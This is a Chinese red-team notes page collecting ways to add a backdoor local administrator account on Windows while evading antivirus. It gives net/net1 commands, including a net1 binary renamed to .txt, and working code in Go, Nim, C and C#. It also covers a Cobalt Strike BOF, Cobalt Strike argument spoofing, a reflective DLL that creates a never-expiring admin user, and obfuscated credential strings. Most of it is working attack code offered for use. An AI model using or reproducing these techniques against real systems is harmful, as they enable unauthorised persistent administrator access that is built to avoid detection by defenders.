主要参考火绒和360
正常添加用户指令
:: Two separate commands (the page layout fused "/add" and "net").
:: First creates a local account, then adds it to the local Administrators group.
net user admin123 admin123!@#123 /add
net localgroup administrators admin123 /add
改名
:: Copies the system binary net1.exe to a .txt name under ProgramData. The file
:: content is unchanged; only its path and filename differ from the original.
copy c:\windows\system32\net1.exe C:\ProgramData\net1.txt
:: The copy is then run directly with the same two argument sets as the
:: net.exe commands above (user creation, then local group membership).
C:\ProgramData\net1.txt user admin123 admin123!@#123 /add & C:\ProgramData\net1.txt localgroup administrators admin123 /add
Windows API添加用户
// Creates a local account and adds it to the local "Administrators" group by
// calling Netapi32's NetUserAdd and NetLocalGroupAddMembers directly through
// syscall, without spawning net.exe / net1.exe.
package main

import (
	"syscall"
	"unsafe"
)

// Thin aliases for the Win32 types used in the structs below.
// LPWSTR is carried as a bare uintptr, so the Go GC does not see the UTF-16
// buffers created by StringToUTF16Ptr as referenced — NOTE(review): those
// buffers may be collected before the API call reads them; confirm.
type (
	DWORD  uint32
	LPWSTR uintptr
)

const (
	USER_PRIV_USER = 1      // usri1_priv: ordinary (non-admin) user privilege
	UF_SCRIPT      = 0x0001 // usri1_flags: required logon-script flag
	NERR_Success   = 0      // NET_API_STATUS success value
)

// Mirror of the Win32 USER_INFO_1 record (level 1 for NetUserAdd).
// Field layout must match lm.h; usri_password is the usri1_password slot.
type USER_INFO_1 struct {
	usri1_name         LPWSTR
	usri_password      LPWSTR
	usri1_password_age DWORD
	usri1_priv         DWORD
	usri1_home_dir     LPWSTR
	usri1_comment      LPWSTR
	usri1_flags        DWORD
	usri1_script_path  LPWSTR
}

// Single-pointer member record passed at level 3 to NetLocalGroupAddMembers.
// NOTE(review): the name suggests LOCALGROUP_USERS_INFO_0, but the call below
// passes level 3, which expects a LOCALGROUP_MEMBERS_INFO_3 — both are one
// LPWSTR, so the layout happens to match; confirm.
type _LOCALGROUP_USERS_INFO_0 struct {
	lgrui0_name LPWSTR
}

var (
	// Library and procedure addresses are resolved at init; errors are discarded,
	// so a missing export would surface only as a failed Syscall6.
	Netapi32, _                = syscall.LoadLibrary("Netapi32.dll")
	NetUserAdd, _              = syscall.GetProcAddress(syscall.Handle(Netapi32), "NetUserAdd")
	NetLocalGroupAddMembers, _ = syscall.GetProcAddress(syscall.Handle(Netapi32), "NetLocalGroupAddMembers")
	dwError                    DWORD                    = 0
	user                       USER_INFO_1              = USER_INFO_1{}
	account                    _LOCALGROUP_USERS_INFO_0 = _LOCALGROUP_USERS_INFO_0{}
)

// add_user_To_the_admin_group fills the global USER_INFO_1, calls NetUserAdd
// (server name 0 = local machine), then adds the same name to the local
// "Administrators" group. Each call's status is only printed; the group add
// runs even if the user add failed. Success/failure messages are in Chinese.
func add_user_To_the_admin_group() {
	user.usri1_name = LPWSTR(unsafe.Pointer(syscall.StringToUTF16Ptr("test57")))
	user.usri_password = LPWSTR(unsafe.Pointer(syscall.StringToUTF16Ptr("P@sss!111")))
	user.usri1_priv = USER_PRIV_USER
	user.usri1_flags = UF_SCRIPT
	// Args: servername=0, level=1, buf=&user, parm_err=uintptr(dwError).
	// dwError is 0 and passed by value, so parm_err is effectively NULL and no
	// invalid-field index is ever received.
	if a, _, _ := syscall.Syscall6(NetUserAdd, 4, 0, 1, uintptr(unsafe.Pointer(&user)), uintptr(dwError), 0, 0); a == 0 {
		println("添加用户成功!")
	} else {
		println("添加用户失败")
	}
	account.lgrui0_name = user.usri1_name
	var admin_group LPWSTR
	admin_group = LPWSTR(unsafe.Pointer(syscall.StringToUTF16Ptr("Administrators")))
	// Args: servername=0, groupname, level=3, buf=&account, totalentries=1.
	if d, _, _ := syscall.Syscall6(NetLocalGroupAddMembers, 5, 0, uintptr(admin_group), 3, uintptr(unsafe.Pointer(&account)), 1, 0); d == NERR_Success {
		println("添加用户到管理员组成功!")
	} else {
		println("添加用户到管理员组失败")
	}
	// Deferred at the very end, so it runs immediately on return; the library
	// handle is released only after both calls have completed.
	defer func() {
		syscall.FreeLibrary(Netapi32)
	}()
}

func main() {
	add_user_To_the_admin_group()
}
可以利用不同的语言进行编写
# Same sequence as the Go and C samples on this page, via the winim bindings:
# NetUserAdd creates a local account, NetLocalGroupAddMembers adds it to the
# local "Administrators" group.
import winim/lean
import winim/inc/lm

# Level-1 user record: only name, password, privilege level and flags are set;
# the remaining USER_INFO_1 fields keep their default (zero) values.
var userInfos = USER_INFO_1(usri1_name: "test123",
  usri1_password: "TestPass123@",
  usri1_priv: USER_PRIV_USER,
  usri1_flags: UF_SCRIPT)
# Level-3 member record reuses the new account's name.
var account = LOCALGROUP_MEMBERS_INFO_3(lgrmi3_domainandname: userInfos.usri1_name)
# parm_err output of NetUserAdd (index of the first rejected field); it is
# filled on failure but never printed below.
var dwError = DWORD 0
# nil server name: the call targets the local machine.
var retVal = NetUserAdd(nil, 1, cast[LPBYTE](&userInfos), &dwError)
if retVal != NERR_Success:
  echo retVal
else:
  echo "[+]User Add Successful !!!"
# The group add is attempted regardless of whether the user add succeeded.
var fiVal = NetLocalGroupAddMembers(nil, "Administrators", 3, cast[LPBYTE](&account), 1)
if fiVal != NERR_Success:
  echo fiVal
else:
  echo "[+]User Add to Administrator Group Successful !!!"
#include "stdafx.h"
#ifndef UNICODE
#define UNICODE
#endif
#pragma comment(lib,"netapi32")
#include <stdio.h>
#include <windows.h>
#include <lm.h>

/*
 * Console variant of the same two-call sequence: NetUserAdd creates a local
 * account (server name NULL = this machine), NetLocalGroupAddMembers adds it to
 * the local "Administrators" group.
 *
 * Both return statuses are discarded: a failed create still attempts the group
 * add, dwError is never inspected, and the process always exits 0. argc/argv
 * are unused.
 */
int wmain(int argc, wchar_t *argv[])
{
    USER_INFO_1 UserInfo;
    DWORD dwLevel = 1;   /* USER_INFO_1 */
    DWORD dwError = 0;   /* receives parm_err from NetUserAdd; unused afterwards */
    /* account name; a trailing '$' is hidden by some enumeration commands
       (e.g. net user), which makes such names a useful detection signal */
    UserInfo.usri1_name = L"test$";
    UserInfo.usri1_password = L"Test@#123"; // password
    UserInfo.usri1_priv = USER_PRIV_USER;
    UserInfo.usri1_home_dir = NULL;
    UserInfo.usri1_comment = NULL;
    UserInfo.usri1_flags = UF_SCRIPT;
    UserInfo.usri1_script_path = NULL;
    /* usri1_password_age is left uninitialised; NetUserAdd is documented to
       ignore it on create — NOTE(review): confirm against the lm.h docs */
    NetUserAdd(NULL, dwLevel, (LPBYTE)&UserInfo, &dwError);
    LOCALGROUP_MEMBERS_INFO_3 account;
    account.lgrmi3_domainandname = UserInfo.usri1_name;
    /* level 3 = member identified by "domain\name" string, one entry */
    NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&account, 1);
    return 0;
}
使用 NetUserAdd 这个 API 添加普通权限的用户，再用 NetLocalGroupAddMembers 这个 API 把该用户加入 Administrators 组。执行时需要 administrator 权限。
利用SAM API进行添加用户
https://idiotc4t.com/redteam-research/netuseradd-ni-xiang
本质是对NetUserAdd的逆向,进行更底层的利用
CS BOF执行
#ifndef UNICODE
#define UNICODE
#endif
#include <windows.h>
#include <lm.h>
#include "beacon.h"

typedef DWORD NET_API_STATUS;
/* BOF import convention: MODULE$Function is resolved by the beacon loader
   at run time, so nothing is linked against netapi32 statically. */
DECLSPEC_IMPORT NET_API_STATUS WINAPI NETAPI32$NetUserAdd(LPWSTR,DWORD,PBYTE,PDWORD);
DECLSPEC_IMPORT NET_API_STATUS WINAPI NETAPI32$NetLocalGroupAddMembers(LPCWSTR,LPCWSTR,DWORD,PBYTE,DWORD);

/*
 * BOF entry point. Creates a local account with NetUserAdd and adds it to the
 * local "Administrators" group with NetLocalGroupAddMembers; both results are
 * reported through BeaconPrintf. args/alen are unused — name and password are
 * hard-coded. The group add runs even when the user add failed.
 */
void go(char * args, int alen) {
    USER_INFO_1 UserInfo;
    DWORD dwLevel = 1;   /* USER_INFO_1 */
    DWORD dwError = 0;   /* parm_err from NetUserAdd; never reported */
    UserInfo.usri1_name = (TCHAR*)L"test123"; // account name
    UserInfo.usri1_password = (TCHAR*)L"Test@#123"; // password
    UserInfo.usri1_priv = USER_PRIV_USER;
    UserInfo.usri1_home_dir = NULL;
    UserInfo.usri1_comment = NULL;
    UserInfo.usri1_flags = UF_SCRIPT;
    UserInfo.usri1_script_path = NULL;
    NET_API_STATUS nStatus;
    nStatus = NETAPI32$NetUserAdd(NULL,dwLevel,(LPBYTE)&UserInfo,&dwError);
    if(nStatus == NERR_Success){
        BeaconPrintf(CALLBACK_OUTPUT, "User has been successfully added", NULL);
    }else{
        BeaconPrintf(CALLBACK_OUTPUT, "User added error %d", nStatus);
    }
    LOCALGROUP_MEMBERS_INFO_3 account;
    account.lgrmi3_domainandname = UserInfo.usri1_name;
    NET_API_STATUS aStatus;
    aStatus = NETAPI32$NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&account, 1);
    if(aStatus == NERR_Success){
        BeaconPrintf(CALLBACK_OUTPUT, "User has been successfully added to Administrators", NULL);
    }else{
        /* unlike the NetUserAdd branch, aStatus is not included in the message,
           so the failure reason is lost */
        BeaconPrintf(CALLBACK_OUTPUT, "User added to Administrators error ", NULL);
    }
}
CS Argue参数欺骗
argue 进程参数欺骗argue [command] [fake arguments]argue 命令 假参数 欺骗某个命令参数argue [command]argue 命令 取消欺骗某个命令参数beacon> argue net1 /bypassbypassbypassbypassbypassbypassbypassbypassbypassbypassbypassbypassbypassbeacon> run net1 user admin123 admin123!@#123 /addbeacon> run net1 localgroup administrators admin123 /add
CS 利用反射dll注入
#include "ReflectiveLoader.h"
#include "framework.h"
#include <stdio.h>

extern "C" HINSTANCE hAppInstance;

/*
 * Reflectively loaded DLL whose DllMain performs the account creation.
 *
 * NetUserAdd is called before the switch, i.e. on EVERY reason code
 * (process attach/detach and each thread attach/detach), not just once.
 * The group add happens only on DLL_PROCESS_ATTACH, after which the DLL calls
 * ExitProcess(0) and terminates its host process. No return status of either
 * Netapi32 call is checked.
 */
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    USER_INFO_1 ui;
    DWORD dwError = 0;   /* parm_err from NetUserAdd; never inspected */
    ui.usri1_name = (TCHAR*)L"lengyis";
    ui.usri1_password = (TCHAR*)L"biweilun";
    ui.usri1_priv = USER_PRIV_USER;
    ui.usri1_home_dir = NULL;
    ui.usri1_comment = NULL;
    /* user cannot change the password, and the password never expires
       (the extra ';' is an empty statement) */
    ui.usri1_flags = UF_DONT_EXPIRE_PASSWD | UF_PASSWD_CANT_CHANGE;;
    ui.usri1_script_path = NULL;
    NetUserAdd(NULL, 1, (LPBYTE)&ui, &dwError);
    wchar_t szAccountName[20] = { 0 };
    switch (ul_reason_for_call)
    {
    case DLL_QUERY_HMODULE:
        /* ReflectiveLoader convention: hand back our own module handle */
        if (lpReserved != NULL)
        {
            *(HMODULE*)lpReserved = hAppInstance;
        }
        break;
    case DLL_PROCESS_ATTACH:
        hAppInstance = hModule;
        /* NOTE(review): this condition reads inverted — "!lpReserved != NULL"
           is true exactly when lpReserved is NULL, so the "%s" branch is taken
           with a null char* and the "No parameter" branch when one was passed. */
        if (!lpReserved != NULL)
        {
            printf("Parameter passed to Reflective DLL: %s", (char*)lpReserved);
        }
        else
        {
            printf("No parameter passed to Reflective DLL");
        }
        /* copy the same name into a local buffer for the level-3 member record */
        const wchar_t* name;
        name = (const wchar_t*)L"lengyis";
        wcscpy_s(szAccountName, name);
        LOCALGROUP_MEMBERS_INFO_3 account;
        account.lgrmi3_domainandname = szAccountName;
        NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&account, 1);
        fflush(stdout);
        /* terminates the host process from inside DllMain; nothing after this runs */
        ExitProcess(0);
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
Csharp 利用windows目录添加用户
利用DirectoryServices进行添加
using System;
using System.DirectoryServices;

namespace NoApiUser
{
    // Decompiled listing (the "Token:" lines are decompiler annotations).
    // Creates a local user and adds it to a local group through the
    // WinNT:// ADSI provider instead of the Netapi32 functions used elsewhere
    // on this page. The user name, password and group name are stored as
    // shifted strings and decoded at run time.
    // Token: 0x02000002 RID: 2
    internal class Program
    {
        /// <summary>
        /// Per-character shift: str[i] - '\n' + '\u0002' is (code point - 8).
        /// As written the expression is an int, so ToString() yields decimal
        /// digits rather than a character; a (char) cast was presumably lost in
        /// decompilation — NOTE(review): verify against the binary. With that
        /// cast, the three literals in Main decode to a user name, a password
        /// and the "Administrators" group name.
        /// </summary>
        // Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250
        public static string decode(string str)
        {
            string text = "";
            for (int i = 0; i < str.Length; i++)
            {
                text += (str[i] - '\n' + '\u0002').ToString();
            }
            return text;
        }

        /// <summary>
        /// Entry point. Step 1 creates the user under WinNT://<machine> with a
        /// password, description and UserFlags; step 2 looks the user and group
        /// up again and adds the user to the group. Each step rethrows any
        /// failure as a bare Exception carrying only the original message, so
        /// the exception type and stack trace are lost.
        /// </summary>
        // Token: 0x06000002 RID: 2 RVA: 0x00002094 File Offset: 0x00000294
        private static void Main(string[] args)
        {
            string text = Program.decode("piksmz");          // user name
            string text2 = Program.decode("ijk9:;)");        // password
            string text3 = Program.decode("Iluqvq{|zi|wz{"); // local group name
            try
            {
                using (DirectoryEntry directoryEntry = new DirectoryEntry(Program.PATH))
                {
                    using (DirectoryEntry directoryEntry2 = directoryEntry.Children.Add(text, "User"))
                    {
                        directoryEntry2.Properties["FullName"].Add(text);
                        directoryEntry2.Invoke("SetPassword", new object[] { text2 });
                        directoryEntry2.Invoke("Put", new object[] { "Description", "Internet User" });
                        // 66049 = 0x10201; by the lm.h values this is
                        // UF_SCRIPT | UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD
                        // — NOTE(review): confirm.
                        directoryEntry2.Invoke("Put", new object[] { "UserFlags", 66049 });
                        directoryEntry2.CommitChanges();
                    }
                }
                Console.WriteLine(string.Concat(new string[] { "[+]Add User: ", text, " password: ", text2, " Successful!" }));
            }
            catch (Exception ex)
            {
                throw new Exception(ex.Message);
            }
            try
            {
                using (DirectoryEntry directoryEntry3 = new DirectoryEntry(Program.PATH))
                {
                    using (DirectoryEntry directoryEntry4 = directoryEntry3.Children.Find(text, "User"))
                    {
                        using (DirectoryEntry directoryEntry5 = directoryEntry3.Children.Find(text3, "group"))
                        {
                            // Name is only checked for emptiness; a missing group
                            // would already have thrown in Find above.
                            if (directoryEntry5.Name != "")
                            {
                                directoryEntry5.Invoke("Add", new object[] { directoryEntry4.Path.ToString() });
                                directoryEntry5.CommitChanges();
                            }
                        }
                    }
                    Console.WriteLine(string.Concat(new string[] { "[+]Add User: ", text, " to ", text3, " Successful!" }));
                }
            }
            catch (Exception ex2)
            {
                throw new Exception(ex2.Message);
            }
        }

        // ADSI path of the local machine's account database.
        // Token: 0x04000001 RID: 1
        private static readonly string PATH = "WinNT://" + Environment.MachineName;
    }
}
